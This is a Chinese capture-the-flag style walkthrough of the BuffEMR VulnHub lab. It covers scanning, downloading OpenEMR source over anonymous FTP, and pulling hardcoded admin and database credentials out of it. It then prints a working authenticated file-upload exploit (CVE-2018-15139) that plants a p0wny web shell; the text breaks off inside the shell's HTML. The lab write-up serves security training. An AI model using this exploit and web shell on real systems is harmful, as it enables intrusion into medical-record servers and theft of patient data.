靶机渗透练习104-BuffEMR:1.0.1
靶机描述
靶机地址:https://www.vulnhub.com/entry/buffemr-101,717/
Description
This is a vulnerable linux box for testing your web application exploitation skills and you will learn basics of binary exploitation.
This works better with VirtualBox rather than VMware. ## Changelog v1.0.1 - 2021-08-31 v1.0.0 - 2021-07-29
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.11.130
靶机:
IP地址:192.168.11.137
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VIrtualBox,设置为仅主机模式
- Kali设置为双网卡,网卡eth0设置为仅主机模式
- 本机上将两个网卡进行桥接
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:46:e0:a0, IPv4: 192.168.11.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.11.1 00:50:56:c0:00:01 VMware, Inc.
192.168.11.137 08:00:27:65:d2:49 PCS Systemtechnik GmbH
192.168.11.254 00:50:56:f5:cd:ff VMware, Inc.
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.981 seconds (129.23 hosts/sec). 3 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.11.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth1 -r 192.168.11.0/24
方法四、fping -aqg 指定网段
fping -aqg 192.168.11.0/24
方法五、待补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# nmap -A -sV -T4 -p- 192.168.11.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-04 15:29 CST
Nmap scan report for 192.168.11.137 (192.168.11.137)
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 0 0 4096 Jun 21 2021 share
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.11.130
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 92:4c:ae:7b:01:fe:84:f9:5e:f7:f0:da:91:e4:7a:cf (RSA)
| 256 95:97:eb:ea:5c:f8:26:94:3c:a7:b6:b4:76:c3:27:9c (ECDSA)
|_ 256 cb:1c:d9:56:4f:7a:c0:01:25:cd:98:f6:4e:23:2e:77 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:65:D2:49 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 1.33 ms 192.168.11.137 (192.168.11.137)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.29 seconds
开放了21、22和80端口
2.2 枚举漏洞
2.2.1 21端口分析
尝试ftp匿名登录
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ftp 192.168.11.137
Connected to 192.168.11.137.
220 (vsFTPd 3.0.3)
Name (192.168.11.137:hirak0): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||6096|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Jun 21 2021 share
226 Directory send OK.
ftp> ls share
229 Entering Extended Passive Mode (|||44969|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 20 Jun 21 2021 README
drwxr-xr-x 31 0 0 4096 Jun 21 2021 openemr
226 Directory send OK.
ftp> ls share/openemr
229 Entering Extended Passive Mode (|||48888|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 5526 Jun 21 2021 CODE_OF_CONDUCT.md
-rw-r--r-- 1 0 0 2876 Jun 21 2021 CONTRIBUTING.md
drwxr-xr-x 4 0 0 4096 Jun 21 2021 Documentation
-rw-r--r-- 1 0 0 35147 Jun 21 2021 LICENSE
-rw-r--r-- 1 0 0 3356 Jun 21 2021 README.md
-rw-r--r-- 1 0 0 20701 Jun 21 2021 acknowledge_license_cert.html
-rw-r--r-- 1 0 0 19560 Jun 21 2021 acl_setup.php
-rw-r--r-- 1 0 0 48330 Jun 21 2021 acl_upgrade.php
-rw-r--r-- 1 0 0 4988 Jun 21 2021 admin.php
-rw-r--r-- 1 0 0 3805 Jun 21 2021 bower.json
-rw-r--r-- 1 0 0 6102 Jun 21 2021 build.xml
drwxr-xr-x 2 0 0 4096 Jun 21 2021 ccdaservice
drwxr-xr-x 4 0 0 4096 Jun 21 2021 ccr
drwxr-xr-x 2 0 0 4096 Jun 21 2021 ci
drwxr-xr-x 2 0 0 4096 Jun 21 2021 cloud
drwxr-xr-x 7 0 0 4096 Jun 21 2021 common
-rw-r--r-- 1 0 0 3301 Jun 21 2021 composer.json
-rw-r--r-- 1 0 0 265675 Jun 21 2021 composer.lock
drwxr-xr-x 2 0 0 4096 Jun 21 2021 config
drwxr-xr-x 11 0 0 4096 Jun 21 2021 contrib
-rw-r--r-- 1 0 0 108 Jun 21 2021 controller.php
drwxr-xr-x 2 0 0 4096 Jun 21 2021 controllers
drwxr-xr-x 2 0 0 4096 Jun 21 2021 custom
-rwxr-xr-x 1 0 0 3995 Jun 21 2021 docker-compose.yml
drwxr-xr-x 2 0 0 4096 Jun 21 2021 entities
drwxr-xr-x 8 0 0 4096 Jun 21 2021 gacl
drwxr-xr-x 2 0 0 4096 Jun 21 2021 images
-rw-r--r-- 1 0 0 901 Jun 21 2021 index.php
drwxr-xr-x 32 0 0 4096 Jun 21 2021 interface
-rw-r--r-- 1 0 0 5381 Jun 21 2021 ippf_upgrade.php
drwxr-xr-x 25 0 0 4096 Jun 21 2021 library
drwxr-xr-x 3 0 0 4096 Jun 21 2021 modules
drwxr-xr-x 3 0 0 4096 Jun 21 2021 myportal
drwxr-xr-x 4 0 0 4096 Jun 21 2021 patients
drwxr-xr-x 6 0 0 4096 Jun 21 2021 phpfhir
drwxr-xr-x 10 0 0 4096 Jun 21 2021 portal
drwxr-xr-x 5 0 0 4096 Jun 21 2021 public
drwxr-xr-x 2 0 0 4096 Jun 21 2021 repositories
drwxr-xr-x 2 0 0 4096 Jun 21 2021 services
-rw-r--r-- 1 0 0 40570 Jun 21 2021 setup.php
drwxr-xr-x 3 0 0 4096 Jun 21 2021 sites
drwxr-xr-x 2 0 0 4096 Jun 21 2021 sql
-rw-r--r-- 1 0 0 4650 Jun 21 2021 sql_patch.php
-rw-r--r-- 1 0 0 5375 Jun 21 2021 sql_upgrade.php
drwxr-xr-x 15 0 0 4096 Jun 21 2021 templates
drwxr-xr-x 5 0 0 4096 Jun 21 2021 tests
drwxr-xr-x 34 0 0 4096 Jun 21 2021 vendor
-rw-r--r-- 1 0 0 2119 Jun 21 2021 version.php
226 Directory send OK.
可以发现share/openemr目录下有一些网站路径下的源码文件
直接将整改目录扒拉下来
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# wget -r -np -nH ftp://192.168.11.137/share/openemr
``````
下载完毕 --2024-04-04 15:37:37--
总用时:19s
下载了:3438 个文件,5.5s (21.4 MB/s) 中的 117M
先放着
2.2.2 22端口分析
需要爆破,暂时没有好的字典
2.2.3 80端口分析
访问80端口:http://192.168.11.137
扫描一下目录
常规文件扫描
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# gobuster dir -u http://192.168.11.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
http://192.168.11.137/index.html (Status: 200) [Size: 10918]
http://192.168.11.137/.php (Status: 403) [Size: 279]
http://192.168.11.137/.html (Status: 403) [Size: 279]
http://192.168.11.137/.php (Status: 403) [Size: 279]
http://192.168.11.137/.html (Status: 403) [Size: 279]
http://192.168.11.137/server-status (Status: 403) [Size: 279]
可执行文件扫描
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# gobuster dir -u http://192.168.11.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
http://192.168.11.137/server-status (Status: 403) [Size: 279]
压缩包,备份扫描
e/hirak0/Vulhub/104]
└─# gobuster dir -u http://192.168.11.137 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
http://192.168.11.137/server-status (Status: 403) [Size: 279]
均没有啥发现,感觉是网站根路径写错了,21端口上有个目录share/openemr下有源码,会不会网站路径是share/openemr,拼接访问看看
经过尝试,网站根路径为:http://192.168.11.137/openemr
这里需要对down下来的源码做一下审计了
grep -r "admin" *
grep -r "root" *
grep -r "'admin'" *
grep -r "admin:" *
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# grep -r "admin:" *
docker-compose.yml: phpmyadmin:
portal/messaging/secure_chat.php: $_SERVER[REMOTE_ADDR] = 'admin::' . $_SERVER[REMOTE_ADDR];
public/assets/angular-1-5-8/angular.js: * $provide.value('RoleLookup', { admin: 0, writer: 1, reader: 2 });
sql/4_2_0-to-4_2_1_upgrade.sql:INSERT INTO `clinical_rules` ( `id`, `pid`, `active_alert_flag`, `passive_alert_flag`, `cqm_flag`, `cqm_nqf_code`, `cqm_pqri_code`, `amc_flag`, `amc_code`, `patient_reminder_flag`, `access_control` ) VALUES ('rule_socsec_entry', 0, 0, 0, 0, '', '', 0, '', 0, 'admin:practice');
sql/database.sql:INSERT INTO `clinical_rules` ( `id`, `pid`, `active_alert_flag`, `passive_alert_flag`, `cqm_flag`, `cqm_nqf_code`, `cqm_pqri_code`, `amc_flag`, `amc_code`, `patient_reminder_flag`, `access_control` ) VALUES ('rule_socsec_entry', 0, 0, 0, 0, '', '', 0, '', 0, 'admin:practice');
tests/test.accounts:admin:Monster123
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cat tests/test.accounts
this is a test admin account:
admin:Monster123
这里可以看到提示,这是一个测试账号
再看看有没数据库的信息
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# grep -r "MYSQL_ROOT_PASSWORD" *
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
docker-compose.yml: MYSQL_ROOT_PASSWORD: root
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cat docker-compose.yml
#
# This is for building a local OpenEMR development and testing environment.
# (Recommend not running it from your git repo and instead mirroring your
# git repo to a testing directory (such as your web directory).)
#
# Brief instructions on how to use (for fuller instructions and examples,
# see the document at contrib/util/docker/README.md):
# 1. docker-compose up -d
# 2. http://localhost:8080 to run setup in openemr (alpine 3.7 with PHP 7.1)
# or
# https://localhost:8090 to run setup in openemr with SSL (alpine 3.7 with PHP 7.1)
# or
# http://localhost:8081 to run setup in openemr (alpine edge with PHP 7.2)
# or
# https://localhost:8091 to run setup in openemr with SSL (alpine edge with PHP 7.2)
# On the main setup input screen:
# 1. for Server Host, use either 'mariadb' or 'mysql' or `mariadb-dev` or 'mysql-dev' or 'mysql-old' or 'mysql-very-old' or 'mariadb-old' or 'mariadb-very-old' or 'mariadb-very-very-old' (have both mariadb/mysql/mariadb-dev/mysql-dev dockers ready to go make testing either one easy; mysql is version 5.7; mysql-dev is version 8; mysql-old is version 5.6; mysql-very-old is version 5.5; mariadb is version 10.2 and mariadb-dev is version 10.3; mariadb-old is version 10.1; mariadb-very-old is version 10.0; mariadb-very-very-old is version 5.5)
# 2. for Root Pass, use 'root'
# 3. for User Hostname, use '%'
# And when need to tear it down and restart it
# 1. docker-compose down -v
# 2. docker-compose up -d
# Can see databases via http://localhost:8100
#
version: '3.1'
services:
openemr-7-1:
restart: always
image: openemr/openemr:flex
ports:
- 8080:80
- 8090:443
volumes:
- .:/var/www/localhost/htdocs/openemr
environment:
EMPTY: "yes"
openemr-7-2:
restart: always
image: openemr/openemr:flex-edge
ports:
- 8081:80
- 8091:443
volumes:
- .:/var/www/localhost/htdocs/openemr
environment:
EMPTY: "yes"
mariadb:
restart: always
image: mariadb:10.2
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mysql:
restart: always
image: mysql:5.7
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mariadb-dev:
restart: always
image: mariadb:10.3
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mysql-dev:
restart: always
image: mysql:8
command: ['mysqld','--character-set-server=utf8','--default-authentication-plugin=mysql_native_password']
environment:
MYSQL_ROOT_PASSWORD: root
mariadb-old:
restart: always
image: mariadb:10.1
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mariadb-very-old:
restart: always
image: mariadb:10.0
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mariadb-very-very-old:
restart: always
image: mariadb:5.5
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mysql-old:
restart: always
image: mysql:5.6
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
mysql-very-old:
restart: always
image: mysql:5.5
command: ['mysqld','--character-set-server=utf8']
environment:
MYSQL_ROOT_PASSWORD: root
phpmyadmin:
restart: always
image: phpmyadmin/phpmyadmin
ports:
- 8100:80
environment:
PMA_HOSTS: mariadb,mysql,mariadb-dev,mysql-dev,mysql-old,mysql-very-old,mariadb-old,mariadb-very-old,mariadb-very-very-old
couchdb:
restart: always
image: couchdb
ports:
- 5984:5984
- 6984:6984
environment:
COUCHDB_USER: admin
COUCHDB_PASSWORD: password
orthanc:
restart: always
image: jodogne/orthanc-plugins
ports:
- 4242:4242
- 8042:8042
COUCHDB_USER: admin
COUCHDB_PASSWORD: password
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cat index.php
<?php
// This program is free software; you can redistribute it and/or
// modify it under the terms of the GNU General Public License
// as published by the Free Software Foundation; either version 2
// of the License, or (at your option) any later version.
// Set the site ID if required. This must be done before any database
// access is attempted.
if (!empty($_GET['site'])) {
$site_id = $_GET['site'];
} else if (is_dir("sites/" . $_SERVER['HTTP_HOST'])) {
$site_id = $_SERVER['HTTP_HOST'];
} else {
$site_id = 'default';
}
if (empty($site_id) || preg_match('/[^A-Za-z0-9\\-.]/', $site_id)) {
die("Site ID '".htmlspecialchars($site_id, ENT_NOQUOTES)."' contains invalid characters.");
}
require_once "sites/$site_id/sqlconf.php";
if ($config == 1) {
header("Location: interface/login/login.php?site=$site_id");
} else {
header("Location: setup.php?site=$site_id");
}
发现登录这边有调用sites/$site_id/sqlconf.php
去看看这个文件
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# cd sites
┌──(root㉿MYsec)-[/home/…/104/share/openemr/sites]
└─# ls
default
┌──(root㉿MYsec)-[/home/…/104/share/openemr/sites]
└─# cd default
┌──(root㉿MYsec)-[/home/…/share/openemr/sites/default]
└─# ls
clickoptions.txt config.php faxcover.txt faxtitle.eps images LBF referral_template.html sqlconf.php statement.inc.php
┌──(root㉿MYsec)-[/home/…/share/openemr/sites/default]
└─# cat sqlconf.php
<?php
// OpenEMR
// MySQL Config
$host = 'localhost';
$port = '3306';
$login = 'openemruser';
$pass = 'openemruser123456';
$dbase = 'openemr';
//Added ability to disable
//utf8 encoding - bm 05-2009
global $disable_utf8_flag;
$disable_utf8_flag = false;
$sqlconf = array();
global $sqlconf;
$sqlconf["host"]= $host;
$sqlconf["port"] = $port;
$sqlconf["login"] = $login;
$sqlconf["pass"] = $pass;
$sqlconf["dbase"] = $dbase;
//////////////////////////
//////////////////////////
//////////////////////////
//////DO NOT TOUCH THIS///
$config = 1; /////////////
//////////////////////////
//////////////////////////
//////////////////////////
?>
这里成功拿到mysql的账户密码
$host = 'localhost';
$port = '3306';
$login = 'openemruser';
$pass = 'openemruser123456';
$dbase = 'openemr';
利用测试账号成功登录后台并发现cms版本号
2.3 漏洞利用
kali本地漏洞库搜索一下
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# searchsploit openemr
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR - 'site' Cross-Site Scripting | php/webapps/38328.txt
OpenEMR - Arbitrary '.PHP' File Upload (Metasploit) | php/remote/24529.rb
OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion | php/webapps/1886.txt
OpenEMR 2.8.1 - 'srcdir' Multiple Remote File Inclusions | php/webapps/2727.txt
OpenEMR 2.8.2 - 'Import_XML.php' Remote File Inclusion | php/webapps/29556.txt
OpenEMR 2.8.2 - 'Login_Frame.php' Cross-Site Scripting | php/webapps/29557.txt
OpenEMR 3.2.0 - SQL Injection / Cross-Site Scripting | php/webapps/15836.txt
OpenEMR 4 - Multiple Vulnerabilities | php/webapps/18274.txt
OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/36034.txt
OpenEMR 4.0.0 - Multiple Vulnerabilities | php/webapps/17118.txt
OpenEMR 4.1 - '/contrib/acog/print_form.php?formname' Traversal Local File Inclusion | php/webapps/36650.txt
OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php?File' 'exec()' Call Arbitrary Shell Command Execution | php/webapps/36651.txt
OpenEMR 4.1 - '/Interface/patient_file/encounter/load_form.php?formname' Traversal Local File Inclusion | php/webapps/36649.txt
OpenEMR 4.1 - '/Interface/patient_file/encounter/trend_form.php?formname' Traversal Local File Inclusion | php/webapps/36648.txt
OpenEMR 4.1 - 'note' HTML Injection | php/webapps/38654.txt
OpenEMR 4.1.0 - 'u' SQL Injection | php/webapps/49742.py
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrary File Upload | php/webapps/24492.php
OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabilities | php/webapps/28329.txt
OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit) | php/remote/28408.rb
OpenEMR 4.1.2(7) - Multiple SQL Injections | php/webapps/35518.txt
OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting | php/webapps/43232.txt
OpenEMR 5.0.0 - Remote Code Execution (Authenticated) | php/webapps/49983.py
OpenEMR 5.0.1 - 'controller' Remote Code Execution | php/webapps/48623.txt
OpenEMR 5.0.1 - Remote Code Execution (1) | php/webapps/48515.py
OpenEMR 5.0.1 - Remote Code Execution (Authenticated) (2) | php/webapps/49486.rb
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) | php/webapps/49998.py
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) | php/webapps/50122.rb
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions | linux/webapps/45202.txt
OpenEMR 5.0.1.3 - Authentication Bypass | php/webapps/50017.py
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated) | php/webapps/45161.py
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) | php/webapps/50037.py
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2) | php/webapps/50087.rb
OpenEMR 5.0.2.1 - Remote Code Execution | php/webapps/49784.py
OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR) | php/webapps/50260.txt
OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities | php/webapps/14011.txt
OpenEMR v7.0.1 - Authentication credentials brute force | php/webapps/51413.py
Openemr-4.1.0 - SQL Injection | php/webapps/17998.txt
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿MYsec)-[/home/…/Vulhub/104/share/openemr]
└─# searchsploit openemr 5.0.1.3
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) | php/webapps/49998.py
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) | php/webapps/50122.rb
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary File Actions | linux/webapps/45202.txt
OpenEMR 5.0.1.3 - Authentication Bypass | php/webapps/50017.py
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated) | php/webapps/45161.py
------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
49998.py 漏洞利用
先利用第一个php/webapps/49998.py
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cp /usr/share/exploitdb/exploits/php/webapps/49998.py /home/hirak0/Vulhub/104/49998.py
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# ll
总计 44
-rwxr-xr-x 1 root root 8583 4月 4日 16:48 45161.py
-rwxr-xr-x 1 root root 23065 4月 4日 17:24 49998.py
drwxr-xr-x 3 root root 4096 4月 4日 15:37 share
-rw-r--r-- 1 root root 309 2021年 6月22日 user.zip
┌──(root㉿MYsec)-[/home/hirak0/Vulhub/104]
└─# cat 49998.py
# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)
# Date 12.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: Prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15139
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139
'''
Description:
Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote
authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload
form and accessing it in the images directory.
'''
'''
Banner:
'''
banner ="""
___ _____ __ __ ____ ____ ___ _ _____
/ _ \ _ __ ___ _ __ | ____| \/ | _ \ | ___| / _ \ / | |___ /
| | | | '_ \ / _ \ '_ \| _| | |\/| | |_) | _____ |___ \| | | || | |_ \
| |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) |
\___/| .__/ \___|_| |_|_____|_| |_|_| \_\ |____(_)___(_)_(_)____/
|_|
_____ _ _ _
| ____|_ ___ __ | | ___ (_) |_
| _| \ \/ / '_ \| |/ _ \| | __|
| |___ > <| |_) | | (_) | | |_
|_____/_/\_\ .__/|_|\___/|_|\__|
|_|
"""
print(banner)
'''
Import required modules
'''
import argparse
import requests
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
'''
Authentication:
'''
# Preparation:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default'
auth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default'
response = session.get(auth_chek_url)
# Header (auth):
header = {
'Host': target_ip,
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://' + target_ip,
'Connection': 'close',
'Referer': auth_chek_url,
'Upgrade-Insecure-Requests': '1',
}
# Body (auth):
body = {
'new_login_session_management': '1',
'authProvider': 'Default',
'authUser': username,
'clearPass': password,
'languageChoice': '1'
}
# Authentication:
print('')
print('[+] Authentication')
auth = session.post(auth_url,headers=header, data=body)
'''
Exploit:
'''
print('')
print('[+] Uploading Webshell:')
# URL:
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php'
# Headers (Exploit):
header = {
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "multipart/form-data; boundary=---------------------------31900464228840324774249185339",
"Origin": "http://" + target_ip,
"Connection": "close",
"Referer": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',
"Upgrade-Insecure-Requests": "1"
}
# Body (Exploit):
body = "-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filename\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_filedata\"\r\n\r\n\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n12000000\r\n-----------------------------31900464228840324774249185339\r\nContent-Disposition: form-data; name=\"form_image\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n 